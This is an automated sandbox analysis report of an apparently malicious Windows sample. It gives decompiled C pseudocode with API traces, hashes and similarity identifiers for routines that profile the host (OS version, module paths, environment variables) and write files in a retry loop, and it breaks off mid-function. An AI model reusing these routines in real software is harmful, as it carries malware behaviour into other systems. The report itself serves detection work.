Opcode Fuzzy Hash: b98f5dbfb87f784ecb6bb2a06bafbae65ba661fe07296e1f39791b71436e54f6
Instruction Fuzzy Hash: B6F0E5315022146FDB202A24AD51FAE33988F11BB7F242A41FD18BB2E0DFB0AC1C86D5

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A5DD, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E5A5DD(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xe6e684; // 0x510f6c8
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x00e5a5e7
0x00e5a5fb
0x00e5a600
0x00e5a609
0x00e5a60b
0x00e5a615
0x00e5a615
0x00000000
0x00e5a61b
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00E58F1F), ref: 00E5A5F8

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e76c212e8b9112c5ceb4ec93c6d09a97db52fd143de0ed5c050212e5f049213f
Instruction ID: 09f448c39ed9cd0151b87cf43f3725da62fcc8cacdffa8e381b9b4fed93a8210
Opcode Fuzzy Hash: e76c212e8b9112c5ceb4ec93c6d09a97db52fd143de0ed5c050212e5f049213f
Instruction Fuzzy Hash: 5BE092B63000147FE6201669ACC8F6B265CE7957FAF090730FA11E31D0C1908C094671

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A763, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E5A763(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				void* _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E00E5A5DD(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E00E5A642(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x00e5a76c
0x00e5a76d
0x00e5a772
0x00e5a776
0x00e5a785
0x00e5a78d
0x00e5a79a
0x00000000
0x00e5a79d
0x00e5a791
0x00000000
0x00e5a791
0x00000000

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 310e57af23a36e417c677b884fb13ed121f0ea399522d3c0d190c85ac134353c
Instruction ID: 26f84279c7c34758f4435e3cd4e21599d2b894efc4cbac5d0a9f368e159d718c
Opcode Fuzzy Hash: 310e57af23a36e417c677b884fb13ed121f0ea399522d3c0d190c85ac134353c
Instruction Fuzzy Hash: 12E068362042256FCB225B389C40CAE33A89F0C3757245F33FC36AB2C1EA30C80442D2

Uniqueness

Uniqueness Score: -1.00%

Function 00E5B31D, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E5B31D(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xe6e684; // 0x510f6c8
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xe6e684; // 0x510f6c8
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t12);
					return _t13;
				}
				return _t5;
			}

0x00e5b31d
0x00e5b325
0x00e5b32a
0x00e5b330
0x00e5b334
0x00e5b336
0x00e5b33b
0x00e5b344
0x00e5b348
0x00e5b348
0x00e5b350
0x00000000
0x00e5b353
0x00e5b357

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00E53C8B,?,?,?,?,?,?,?,?,00E53D70,00000000), ref: 00E5B350

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ae8541adf15ae096ff54eadaa3ce39d5d0b249ccc707b1a7edcb2830aba6e89c
Instruction ID: 6b6a5f1050afbbc25bf94cdea4ef4249cf6b58ac154a2e1365375e950116e24e
Opcode Fuzzy Hash: ae8541adf15ae096ff54eadaa3ce39d5d0b249ccc707b1a7edcb2830aba6e89c
Instruction Fuzzy Hash: 86E04F363001209FC6204B6AFC4CF6B7B6DEB95AA1B060168F909E7291CBA08806C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A621, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E5A621(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x00e5a635
0x00e5a638
0x00e5a63d
0x00e5a641

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00E5A6AF,00000000,00000400,00000000,00E5F8C0,00E5F8C0,?,00E5FA61,00000000), ref: 00E5A635

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 68b7296f98f69d61857187e5a33669125f306d200527f49d5835f2d987f61981
Instruction ID: d703f9bc8f045d70614984d2ddfee225b71dadde9829021f3dda74ee639cdae6
Opcode Fuzzy Hash: 68b7296f98f69d61857187e5a33669125f306d200527f49d5835f2d987f61981
Instruction Fuzzy Hash: 13D012B13A0100BEFB2C8B34DD5AF76329CD710701F22025CBA06EA0E1CAA9E9088720

Uniqueness

Uniqueness Score: -1.00%

Function 00E585EA, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E585EA(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xe6e768, 8, _a4); // executed
				return _t2;
			}

0x00e585f8
0x00e585ff

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bca370513adb158315529eb587ffc5de4aaee7b3e98e8124989489a55927ae80
Instruction ID: 8954eefe638546fe86c778dd9485430f9ff989b1d201896b3e411855aa161aeb
Opcode Fuzzy Hash: bca370513adb158315529eb587ffc5de4aaee7b3e98e8124989489a55927ae80
Instruction Fuzzy Hash: 75B09235080208FFEE411B92FD05A867F69E705695F009011F60C241B18AB26468DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E585D5, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E585D5() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xe6e768 = _t1;
				return _t1;
			}

0x00e585de
0x00e585e4
0x00e585e9

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00E55F84), ref: 00E585DE

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d69da316d96e4d2d230f76001205048bb8c116cbff4062a3245378a55ab3bc5f
Instruction ID: 48c64ad4ac5c7ff70acc5eb128d9d18a193bd779d0b2256e070ecfbfac85f702
Opcode Fuzzy Hash: d69da316d96e4d2d230f76001205048bb8c116cbff4062a3245378a55ab3bc5f
Instruction Fuzzy Hash: 7CB012742807006EF6E01B217E06B013690A300B46F301001F304782D0CAE0200CCA04

Uniqueness

Uniqueness Score: -1.00%

Function 00E5F9CA, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E5F9CA(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0xe6e654; // 0x510fb08
				_t27 = E00E585EA( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0xe6e654; // 0x510fb08
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E00E586C7(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E00E5109A(_t63, 0x34a);
						_t66 =  *0xe6e688; // 0xe80000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E00E595C7(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0xe6e688; // 0xe80000
						_push(_t67);
						_v20 = E00E592CB(_t39 + 0x1020);
						_t42 = E00E5A68F( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E00E585BB( &_v24);
						E00E585BB( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0xe6e654; // 0x510fb08
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E00E586C7(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E00E58600( &_v16, _t69); // executed
						E00E58600( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0xe6e654; // 0x510fb08
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0xe6e688; // 0xe80000
						_t31 = E00E5A763(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0xe6e654; // 0x510fb08
							continue;
						}
						break;
					}
					E00E58600( &_v12, 0);
				}
				return 0;
			}

0x00e5f9d0
0x00e5f9d8
0x00e5f9dd
0x00e5f9e3
0x00e5f9e9
0x00e5f9fc
0x00e5fa06
0x00e5fa10
0x00e5fa13
0x00e5fa18
0x00e5fa2e
0x00e5fa32
0x00e5fa37
0x00e5fa38
0x00e5fa39
0x00e5fa3e
0x00e5fa41
0x00e5fa42
0x00e5fa43
0x00e5fa48
0x00e5fa57
0x00e5fa5c
0x00e5fa61
0x00e5fa68
0x00e5fa71
0x00e5fa76
0x00e5fa79
0x00e5fa7c
0x00e5fa81
0x00e5fa87
0x00e5fa8c
0x00e5fa91
0x00e5fa94
0x00e5faa7
0x00e5faac
0x00e5faaf
0x00e5faaf
0x00e5fab7
0x00e5fac2
0x00e5fac7
0x00e5faca
0x00e5facd
0x00e5facd
0x00e5fad3
0x00e5fad5
0x00e5fad9
0x00e5fae4
0x00e5fae9
0x00e5faee
0x00000000
0x00000000
0x00e5faf7
0x00e5fafd
0x00e5fb04
0x00e5fb06
0x00e5fb09
0x00000000
0x00e5fb09
0x00000000
0x00e5fb04
0x00e5fb16
0x00e5fb1f
0x00e5fb23

APIs

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,00E5F8C0,?,?,?,00E5FCC4,00000000), ref: 00E5FAF7

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: 8c2feb3e026506c1f83094ff0dcfe0a0e4a20e2ba99f2ae2cd976773403c81f4
Instruction ID: 7e25b387e221f6aafa15a527cbe70730ab7d938025545d5e03189906c7db345c
Opcode Fuzzy Hash: 8c2feb3e026506c1f83094ff0dcfe0a0e4a20e2ba99f2ae2cd976773403c81f4
Instruction Fuzzy Hash: BE41CE71A00104EFDB00EBA4DD85EAF73FCEB44345F044979F905F7292EA749A098BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E55D65, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E55D65(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xe6e688; // 0xe80000
				E00E5A853( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xe6e684; // 0x510f6c8
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xe6e688; // 0xe80000
					_t12 = E00E5595C( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xe6e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00E59EA1();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xe6e688; // 0xe80000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x00e55d68
0x00e55d7d
0x00e55d86
0x00e55d8f
0x00e55d91
0x00e55d99
0x00e55da9
0x00e55db7
0x00e55dbc
0x00e55dc1
0x00e55dc3
0x00e55dc5
0x00e55dca
0x00e55dcc
0x00e55de7
0x00e55de7
0x00e55dce
0x00e55dcf
0x00e55dda
0x00e55de2
0x00e55de4
0x00e55de4
0x00e55dcc
0x00e55de9
0x00e55d9b
0x00e55d9c
0x00e55da1
0x00e55da6
0x00e55da6
0x00e55ded

APIs

lstrcmpiW.KERNEL32(00E7FDD8,00000000), ref: 00E55DDA

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: b2a37081bbf9b2ef8868bd08c88deb456c49740fa75e29b9dd6121f86b7d7b90
Instruction ID: 4920f6a753d47951a12a36a061ffbdc8ea52b04c26b57c438786c52648555f86
Opcode Fuzzy Hash: b2a37081bbf9b2ef8868bd08c88deb456c49740fa75e29b9dd6121f86b7d7b90
Instruction Fuzzy Hash: 9901B1372011119FE740E76AEC69F9B33E89B08356F155424F902FB2A1DAA0D8098BB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E5D02A, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00E5D02A(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xe6e69c; // 0x10000000
				_t81 = E00E585EA(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xe6e684; // 0x510f6c8
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00E6230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00E58FA4(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E00E5B9EB();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E00E5BB73( *_t88) == 0) {
					_t90 = E00E5BA48(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E00E5E3FC(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E00E5E3C1(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xe6e68c; // 0x510f890
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xe6e694; // 0x510f820
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00E58FA4(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E00E5B78E(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E00E5B663(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00E58FBE(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E00E5D40B(_t43, E00E5C384(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E00E5B870(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E00E5BBC5(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xe6e684; // 0x510f6c8
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E00E595C7(_t199, 0x10c);
				_t200 =  *0xe6e684; // 0x510f6c8
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E00E585BB( &_v8);
				_t124 =  *0xe6e684; // 0x510f6c8
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00E59626(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xe6e684; // 0x510f6c8
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xe6e684; // 0x510f6c8
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xe6e684; // 0x510f6c8
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xe6e684; // 0x510f6c8
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00E6230C(E00E5D40B(_t75, E00E5C384(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E00E622DE( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E00E59013(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E00E5CD3E(_t79);
				return _t222;
			}

0x00e5d02a
0x00e5d034
0x00e5d040
0x00e5d045
0x00e5d04a
0x00e5d40a
0x00e5d40a
0x00e5d057
0x00e5d05d
0x00e5d062
0x00e5d068
0x00e5d078
0x00e5d084
0x00e5d084
0x00e5d08d
0x00e5d093
0x00e5d095
0x00e5d09e
0x00e5d09e
0x00e5d0aa
0x00e5d0ae
0x00e5d0b3
0x00e5d0b9
0x00e5d0c2
0x00e5d0d0
0x00e5d0d7
0x00e5d0dc
0x00e5d0dc
0x00e5d0dd
0x00e5d0c4
0x00e5d0c4
0x00e5d0c4
0x00e5d0e3
0x00e5d0ee
0x00e5d0fc
0x00e5d102
0x00e5d106
0x00e5d10c
0x00e5d113
0x00e5d11a
0x00e5d11e
0x00e5d125
0x00e5d126
0x00e5d133
0x00e5d135
0x00e5d13a
0x00e5d147
0x00e5d149
0x00e5d149
0x00e5d14b
0x00e5d155
0x00e5d161
0x00e5d171
0x00e5d177
0x00e5d17d
0x00e5d17f
0x00e5d190
0x00e5d196
0x00e5d19c
0x00e5d1a1
0x00e5d1a7
0x00e5d1ad
0x00e5d1b2
0x00e5d1b7
0x00e5d1b7
0x00e5d1bd
0x00e5d1bd
0x00e5d1c6
0x00e5d1d2
0x00e5d1da
0x00e5d1de
0x00e5d1de
0x00e5d1da
0x00e5d1e2
0x00e5d1e8
0x00e5d1ee
0x00e5d1f5
0x00e5d206
0x00e5d20c
0x00e5d214
0x00e5d21b
0x00e5d22e
0x00e5d234
0x00e5d239
0x00e5d23c
0x00e5d23f
0x00e5d245
0x00e5d24b
0x00e5d24d
0x00e5d253
0x00e5d25c
0x00e5d25f
0x00e5d25f
0x00e5d262
0x00e5d26a
0x00e5d275
0x00e5d27b
0x00e5d26c
0x00e5d26e
0x00e5d26e
0x00e5d284
0x00e5d284
0x00e5d28a
0x00e5d292
0x00e5d29d
0x00e5d2a2
0x00e5d2a8
0x00e5d2aa
0x00e5d2b7
0x00e5d2b8
0x00e5d2b9
0x00e5d2c4
0x00e5d2c6
0x00e5d2cd
0x00e5d2cd
0x00e5d2d7
0x00e5d2dc
0x00e5d2e1
0x00e5d2e1
0x00e5d2e7
0x00e5d2ee
0x00e5d2ef
0x00e5d2fc
0x00e5d30f
0x00e5d314
0x00e5d319
0x00e5d322
0x00e5d322
0x00e5d328
0x00e5d32d
0x00e5d333
0x00e5d339
0x00e5d33e
0x00e5d347
0x00e5d349
0x00e5d350
0x00e5d350
0x00e5d356
0x00e5d35e
0x00e5d363
0x00e5d364
0x00e5d369
0x00e5d372
0x00e5d374
0x00e5d37f
0x00e5d37f
0x00e5d388
0x00e5d390
0x00e5d397
0x00e5d39c
0x00e5d3ab
0x00e5d3c3
0x00e5d3ca
0x00e5d3d8
0x00e5d3ea
0x00e5d3f1
0x00e5d3fe
0x00000000

APIs

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

GetCurrentProcessId.KERNEL32 ref: 00E5D051
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 00E5D08D
GetCurrentProcess.KERNEL32 ref: 00E5D0AA
GetLastError.KERNEL32 ref: 00E5D149
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 00E5D177
GetLastError.KERNEL32 ref: 00E5D17D
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 00E5D1D2
GetCurrentProcess.KERNEL32 ref: 00E5D219
memset.MSVCRT ref: 00E5D234
GetVersionExA.KERNEL32(00000000), ref: 00E5D23F
GetCurrentProcess.KERNEL32(00000100), ref: 00E5D259
GetSystemInfo.KERNEL32(?), ref: 00E5D275
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 00E5D292

Strings

TEMP, xrefs: 00E5D333, 00E5D33E, 00E5D34F
USERPROFILE, xrefs: 00E5D2EF, 00E5D31D
%s\%s, xrefs: 00E5D304
TEMP, xrefs: 00E5D2FE
SystemDrive, xrefs: 00E5D35E, 00E5D369, 00E5D37E

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: d21baa9acfda2a8528282d96f861aafe3d70469a57535dffee81d238b2f31155
Instruction ID: abd0f47ef3dddf781f63f2c49a8a9e125234a200678ff0521bccd0bb566f51a8
Opcode Fuzzy Hash: d21baa9acfda2a8528282d96f861aafe3d70469a57535dffee81d238b2f31155
Instruction Fuzzy Hash: 47B19271600704AFD720EB71DD85FEB77E8EF18341F005829F95AE7291EBB0A9498B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E5DB47, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00E5DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
